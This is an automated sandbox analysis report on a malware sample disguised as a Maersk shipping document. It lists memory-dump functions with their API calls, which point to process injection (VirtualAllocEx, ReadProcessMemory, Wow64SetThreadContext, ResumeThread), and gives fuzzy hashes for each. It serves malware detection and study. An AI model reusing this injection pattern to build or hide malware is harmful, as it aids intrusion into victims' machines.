                                                    • Snapshot File: hcaresult_0_2_31b0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: fe93cc2af778bd5cd3f497a4c016b1ecc98509128c5f643dd76e413086d7b461
                                                    • Instruction ID: 822513e40c82c7034c2eaa3fd2fcfb3701ebae9a53a5e5925c9e67406d490903
                                                    • Opcode Fuzzy Hash: fe93cc2af778bd5cd3f497a4c016b1ecc98509128c5f643dd76e413086d7b461
                                                    • Instruction Fuzzy Hash: 7F21E3B5D00208AFDB10CFA9D585ADEBBF4FB48310F14841AE918B7350D374A955CFA1
                                                    Function 07FA5B60 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07FA5BE0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: b273255f7f152a3957db4855b991d558a17625ac92cdcaeafad584859fab59ed
                                                    • Instruction ID: 095f0dfe2cdfb4554c922f3435aa7b453e25b0760388a036aebd4869a9611bc6
                                                    • Opcode Fuzzy Hash: b273255f7f152a3957db4855b991d558a17625ac92cdcaeafad584859fab59ed
                                                    • Instruction Fuzzy Hash: 782137B1D003599FCB10DFAAC881AEEFBF5FF48310F14842AE919A7240C7799944CBA1
                                                    Function 07FA54A0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07FA551E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: f12f2b9932faf3f6e5464377e503f0f596fc936fdb19957d77b89df455f1f106
                                                    • Instruction ID: 852ec61e7c369877ed3159bc6c8d50091383514794e1907711cc70d66f1c9a3b
                                                    • Opcode Fuzzy Hash: f12f2b9932faf3f6e5464377e503f0f596fc936fdb19957d77b89df455f1f106
                                                    • Instruction Fuzzy Hash: B22127B1D003099FDB10DFAAC485BEEBBF5EF48324F14842AD559A7240D778A949CFA1
                                                    Function 031BD7C8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 031BD84F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1336087492.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_31b0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: c046f1fc32a4f55dccf3598a816004ecb624408bd7dfe5fa6d74c2ed0d0c8601
                                                    • Instruction ID: ef26ed9c7c0889a8443d1a84dbdeb906b4879d46ff677a6dbcfeebcf1bddf2cd
                                                    • Opcode Fuzzy Hash: c046f1fc32a4f55dccf3598a816004ecb624408bd7dfe5fa6d74c2ed0d0c8601
                                                    • Instruction Fuzzy Hash: 4D21B3B5D002489FDB10CFAAD584ADEBBF5EB48310F14841AE918A3250D374A944CFA5
                                                    Function 07FA59A9 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07FA5A1E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 46a3c76d32afd96c9315916ce11e4f6d39600df13ca2c0666339ec43720b29c4
                                                    • Instruction ID: 790ea65e4d41f560dba1739e164c65596ae69c97c84aa465e9df4d17ce8ab502
                                                    • Opcode Fuzzy Hash: 46a3c76d32afd96c9315916ce11e4f6d39600df13ca2c0666339ec43720b29c4
                                                    • Instruction Fuzzy Hash: AA1159B19002099FCB10DFA9D845ADEFBF5EF48320F148819E519A7250C7759954CFA0
                                                    Function 07FA59B0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07FA5A1E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: b30b30077205a922eecb895ff36a6eda53885207b506a87640b1190eee3da4e7
                                                    • Instruction ID: 72775bbb01b2d0befe2de1a2335125429f5bea02c05c2561c5fb34c7d3e102c0
                                                    • Opcode Fuzzy Hash: b30b30077205a922eecb895ff36a6eda53885207b506a87640b1190eee3da4e7
                                                    • Instruction Fuzzy Hash: E31167B1D002099FCB10DFAAC845ADEBFF5EF48320F148819E519A7250C775A944CFA0
                                                    Function 07FA53E9 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: 048a68cee2eeca779d9f190170b0cf5b1dd510f871a74e64ae139b0883ea6d71
                                                    • Instruction ID: 212a873dd319b1d5c988452d21e8f82f1076e32edb4ae5b3f28e19aae80498c4
                                                    • Opcode Fuzzy Hash: 048a68cee2eeca779d9f190170b0cf5b1dd510f871a74e64ae139b0883ea6d71
                                                    • Instruction Fuzzy Hash: AD1146B1D003499FCB20DFAAC4457DEFBF4EF88320F248819D419A7240C775A944CBA0
                                                    Function 07FA53F0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: f1b06dba5c248c8305c01c783bd54fc4f69fbfa337735d3f77eb4b635e947aec
                                                    • Instruction ID: f7a0e35e09e4f2a4e4a5d37f9e97d6aae9b136c27f9ac4d9ea0ade317ab240f0
                                                    • Opcode Fuzzy Hash: f1b06dba5c248c8305c01c783bd54fc4f69fbfa337735d3f77eb4b635e947aec
                                                    • Instruction Fuzzy Hash: A51136B1D043499FCB20DFAAC4457DEFBF9EB88324F24881AD519A7240C775A944CBA1
                                                    Function 031BB500 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 031BB566
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1336087492.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_31b0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: c7f7ca7bdfbca01f55914a8c2916d0411f5577bf6c2d80c2d8234613150cd13b
                                                    • Instruction ID: f3d1df40e84ab24fd31daa62887824c5b0db30df684fd8dff89310445db4d3b1
                                                    • Opcode Fuzzy Hash: c7f7ca7bdfbca01f55914a8c2916d0411f5577bf6c2d80c2d8234613150cd13b
                                                    • Instruction Fuzzy Hash: 051110B5D002498FCB10DF9AD444ADEFBF4EB88310F14841AD819B7610C379A545CFA1
                                                    Function 07FA25FC Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 07FA819D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: dcba7cfedd77bbedad7d865d89515135c2bccd8fd8957f2f1f43d2a13a61bb17
                                                    • Instruction ID: 4d8ac1df1538ff0f3ae4f5c98d82d409f21ab88e1ffc5d084f5b155e1cf28878
                                                    • Opcode Fuzzy Hash: dcba7cfedd77bbedad7d865d89515135c2bccd8fd8957f2f1f43d2a13a61bb17
                                                    • Instruction Fuzzy Hash: 981106B5800349AFCB50DF9AD849BDEFBF8EB48320F148419E918B7200C375A944CFA1
                                                    Function 07FA813B Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 07FA819D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: db8244d25a0babf345a7ed0f47408df90c79bbabdc406848e9aba2883d5b2f59
                                                    • Instruction ID: 4fcf149237a5598be1273c8ce361a43978be7223cd30b295f31e83a515252a5a
                                                    • Opcode Fuzzy Hash: db8244d25a0babf345a7ed0f47408df90c79bbabdc406848e9aba2883d5b2f59
                                                    • Instruction Fuzzy Hash: B91106B58003499FCB10DF9AD849BDEFFF8EB48320F14845AD958A7200C375A584CFA1
                                                    Function 07C42D98 Relevance: 1.5, Strings: 1, Instructions: 218COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (cq
                                                    • API String ID: 0-301743287
                                                    • Opcode ID: d1d5675d8b38496810195bf31c12d2c9e240e4260b080bfffbad77ac3128c7ef
                                                    • Instruction ID: 05979701d2b0da2e8a80b5d34dd4457e26c2b4b83694a6e73b0292bf1ebe26ca
                                                    • Opcode Fuzzy Hash: d1d5675d8b38496810195bf31c12d2c9e240e4260b080bfffbad77ac3128c7ef
                                                    • Instruction Fuzzy Hash: 9771F5B06002069FDB24DB29D895BAEBBE6FFC4310F10852AE4069B2A4DF75DD45C790
                                                    Function 07C477C8 Relevance: 1.4, Strings: 1, Instructions: 169COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %*&/)(#$^@!~-_
                                                    • API String ID: 0-3325533558
                                                    • Opcode ID: 72fda3e35a650e669f6eeb8fb75768251a3e6a6e642a6d6fce188fbb65c4cfc2
                                                    • Instruction ID: 55aaef1f75279872d18fb38a6ce9f28ea8c04b89801210b9814fa4b075a2e257
                                                    • Opcode Fuzzy Hash: 72fda3e35a650e669f6eeb8fb75768251a3e6a6e642a6d6fce188fbb65c4cfc2
                                                    • Instruction Fuzzy Hash: DE617E35B002069FD700AF64D555BAEB7B2FF88300F1489A9E8859F39ACB706D4AC7D1
                                                    Function 07C4ED10 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Te_q
                                                    • API String ID: 0-823545363
                                                    • Opcode ID: d9459680c3b539405c2d911419c4922ebc90b3750e68087dbb181b9c6d57088a
                                                    • Instruction ID: 57089381451b5bf7ef2bb399eff9a1aa3756e82dc49c8e81fa0a35c2fa28bb91
                                                    • Opcode Fuzzy Hash: d9459680c3b539405c2d911419c4922ebc90b3750e68087dbb181b9c6d57088a
                                                    • Instruction Fuzzy Hash: 514103B4E14218CFDB18DFAAC9846EEBBF6BF8A300F15842AD409AB354DB745905CB50
                                                    Function 07C48E68 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $_q
                                                    • API String ID: 0-238743419
                                                    • Opcode ID: eef2cef4a07fe904b652c945b05d227d0e61846c60820d7084a045aaad91b21a
                                                    • Instruction ID: 080bd201988bdfdb0df66d2d5accba445501d84627313b0eb7d3e089b5bdd593
                                                    • Opcode Fuzzy Hash: eef2cef4a07fe904b652c945b05d227d0e61846c60820d7084a045aaad91b21a
                                                    • Instruction Fuzzy Hash: 371138B892C290EFC321976684502797FE59F47318F2884DBD54ACB192C33E8802C36F
                                                    Function 084AD478 Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 084AD4D8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351198590.00000000084A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_84a0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: bd746ed2c6586fd39a022b0a7b70a2ead725ac23d3203e541d5fd853fbd2eb3a
                                                    • Instruction ID: 13b55324d212ee81a641bdcbfba44e086313295e9f1d6508361ae5f9c58d1dd9
                                                    • Opcode Fuzzy Hash: bd746ed2c6586fd39a022b0a7b70a2ead725ac23d3203e541d5fd853fbd2eb3a
                                                    • Instruction Fuzzy Hash: B81163B5C003499FCB20DF9AC545BDEBBF4EB48320F20841AD958A7340C338A648CFA1
                                                    Function 084AD480 Relevance: 1.3, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 084AD4D8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351198590.00000000084A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_84a0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: ed1a8e85ca92b69331855d7968777764f1bb578ee9b3fb2222801ea4521f7d3f
                                                    • Instruction ID: 95d294e0a419b0190f265d3f93c54327aceec35f5cb4045da5ccbbf13530f1c0
                                                    • Opcode Fuzzy Hash: ed1a8e85ca92b69331855d7968777764f1bb578ee9b3fb2222801ea4521f7d3f
                                                    • Instruction Fuzzy Hash: 131145B5C003499FCB60DF9AC545BDEBBF4EB48320F20841AD958A7740D338A644CFA5
                                                    Function 07C47D58 Relevance: 1.3, Strings: 1, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: W
                                                    • API String ID: 0-655174618
                                                    • Opcode ID: ec7b6ca5a0d026b0042edfb02bb2743ce50e13fe26a21d7cf89dec13c1c0a92b
                                                    • Instruction ID: cf10b1dc0d5e4d37a6f4ca933f804923c841249ccec2f04d77b24ce747d564e4
                                                    • Opcode Fuzzy Hash: ec7b6ca5a0d026b0042edfb02bb2743ce50e13fe26a21d7cf89dec13c1c0a92b
                                                    • Instruction Fuzzy Hash: A101647096C3848FCB029778C4442B97FB2AF87309F1880AED4454F282C33E8982CB22
                                                    Function 07C482C1 Relevance: 1.3, Strings: 1, Instructions: 39COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $_q
                                                    • API String ID: 0-238743419
                                                    • Opcode ID: 41e1f1abf42b0d9da777081a3c8394e7986fda17d8ffc12c8b447075bb41772b
                                                    • Instruction ID: 09e4fed3944860121e84e5df00358e9b092266359065862041967760a8706473
                                                    • Opcode Fuzzy Hash: 41e1f1abf42b0d9da777081a3c8394e7986fda17d8ffc12c8b447075bb41772b
                                                    • Instruction Fuzzy Hash: 38018CF0A1A642CFC3258B19D4506B4BBF1FB07344F1883AAD60ACB552D3748945CB6A
                                                    Function 07C46D2F Relevance: 1.3, Strings: 1, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: G
                                                    • API String ID: 0-985283518
                                                    • Opcode ID: bf6f77048cc17d9e443ba163efebdb7099e7361042af1926040bbd6b17982fce
                                                    • Instruction ID: 99ddfadc06e47dde6dfbff4a97c5d5e5c77816592dc6da912826a85802a5e39f
                                                    • Opcode Fuzzy Hash: bf6f77048cc17d9e443ba163efebdb7099e7361042af1926040bbd6b17982fce
                                                    • Instruction Fuzzy Hash: 95C012B0408108E7CA04CF55D90557CB76CD702211F000185D80E93501DF311E205693
                                                    Function 07C46D30 Relevance: 1.3, Strings: 1, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: G
                                                    • API String ID: 0-985283518
                                                    • Opcode ID: fd6da84ee564e834af0a53c834fc2678f781afdd0519db7ac62007404bf56382
                                                    • Instruction ID: 19307e5a0f296d485bfc70422dadb9fddbf38f8383b7de9fb5cb194297e1ed8a
                                                    • Opcode Fuzzy Hash: fd6da84ee564e834af0a53c834fc2678f781afdd0519db7ac62007404bf56382
                                                    • Instruction Fuzzy Hash: C0C012B0408108EBCA04CF86D90562CB7ACEB02211F000189D80EA3201DB311E20AA82
                                                    Function 07C43478 Relevance: .5, Instructions: 458COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 237191a9b0698857b933a8c462f895ebc53983e9f190490d04de134fbfa1dd3c
                                                    • Instruction ID: d08cfa9b5bde36487cfa97f712811d8e987976718f36a957450ddf500c871f00
                                                    • Opcode Fuzzy Hash: 237191a9b0698857b933a8c462f895ebc53983e9f190490d04de134fbfa1dd3c
                                                    • Instruction Fuzzy Hash: 69D1E1F0F00286DFCB15AB69C5886AEBFF1FF85200F5544A9D482BB295E730C965CB85
                                                    Function 07C40480 Relevance: .3, Instructions: 332COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b7319da169142040b9b9cadaf5d0bd620210c2272727b9b8b0d26456346d7a30
                                                    • Instruction ID: 4ff4f8721e47dd6f9c62831bc1e29decdd2ace75a79998803ba60ceddc0dddc3
                                                    • Opcode Fuzzy Hash: b7319da169142040b9b9cadaf5d0bd620210c2272727b9b8b0d26456346d7a30
                                                    • Instruction Fuzzy Hash: 83F1D775D1061ACBCF10DFA8C854AEDB7B5FF58300F1086A9E549B7254EB70AA85CF90
                                                    Function 07C40471 Relevance: .3, Instructions: 306COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 39d5f9ab7a087263b61dbcbea51d02b4744da2ba4a02461e80fcd8b34493c900
                                                    • Instruction ID: ff175b9cbbfbb408ca5d6938f961723490343fca4d61fe27345bba3bc793a3db
                                                    • Opcode Fuzzy Hash: 39d5f9ab7a087263b61dbcbea51d02b4744da2ba4a02461e80fcd8b34493c900
                                                    • Instruction Fuzzy Hash: 95E1F871D1061A8FCF10DFA8C954AEDB7B5FF48300F1086AAD549B7254EB70AA89CF90
                                                    Function 07C44AA1 Relevance: .2, Instructions: 235COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b727bf2a6d8d9ffce9125d4799161d54f25e1606cf84b7f0306ab13afc87f5a0
                                                    • Instruction ID: 7222067d4aeeb978040c66b759331954252db72e2424356b714422c1e05b5c9e
                                                    • Opcode Fuzzy Hash: b727bf2a6d8d9ffce9125d4799161d54f25e1606cf84b7f0306ab13afc87f5a0
                                                    • Instruction Fuzzy Hash: AFB1E675910619CFDB10EF68C840AD9FBB1FF49314F15C299E949BB211EB30AA89CF90
                                                    Function 07C40C38 Relevance: .1, Instructions: 147COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1884bfe8e55178b8a3e3ee656a7e1a566b1461ad92a5f94fc8c1544e9bb197c5
                                                    • Instruction ID: abc17b4e3e20e9e0cac5059f1f7a50359bd029d8fe351e2877f713fed4920c76
                                                    • Opcode Fuzzy Hash: 1884bfe8e55178b8a3e3ee656a7e1a566b1461ad92a5f94fc8c1544e9bb197c5
                                                    • Instruction Fuzzy Hash: 00511D74A1060ACFCF10EFA8C8909ADF7B5FF89310B109669E516B7314EB30E989CB50
                                                    Function 07C41800 Relevance: .1, Instructions: 132COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7b8bd984b27d0e9138ad237cb00ae0eaad32350e2513f9ac206ab63c9530efea
                                                    • Instruction ID: 9e3c3e88095f08787f4f1e0f7ab6f83c96f8aa09c0dbe6f760f5f85fcc0b97dd
                                                    • Opcode Fuzzy Hash: 7b8bd984b27d0e9138ad237cb00ae0eaad32350e2513f9ac206ab63c9530efea
                                                    • Instruction Fuzzy Hash: BA418DB0B1120ADFDB18DF69D954AAEB7B6EF89301B188069E44697294DF30D980CB51
                                                    Function 07C40E40 Relevance: .1, Instructions: 131COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bf76416e8dba2089cd42ab76faa4ec1fbe90c4f409bbbe812ba3d3c2eea546f7
                                                    • Instruction ID: f4d27de39a90d5dba117524d7830e6d020612d61640b8d036d400980b2f0890b
                                                    • Opcode Fuzzy Hash: bf76416e8dba2089cd42ab76faa4ec1fbe90c4f409bbbe812ba3d3c2eea546f7
                                                    • Instruction Fuzzy Hash: 5451A835A10609CFCB00EFA8D8849EDFBB5FF89304F00816AE515AB325EB30E955CB91
                                                    Function 07C40C2A Relevance: .1, Instructions: 125COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ac4b7665bd1994472ddff1f24cb187b4d02d75a23da2d73d77fac412a442ba57
                                                    • Instruction ID: 7c51e17f002bc0905fb1455594a6726fd5ed6fcc499a08e084a7041e1d83a3c1
                                                    • Opcode Fuzzy Hash: ac4b7665bd1994472ddff1f24cb187b4d02d75a23da2d73d77fac412a442ba57
                                                    • Instruction Fuzzy Hash: 07415274A1060ACFCF10DF64C8905ADFBB1FF89310B1496A9E956E7355EB34E989CB80
                                                    Function 07C49E07 Relevance: .1, Instructions: 122COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
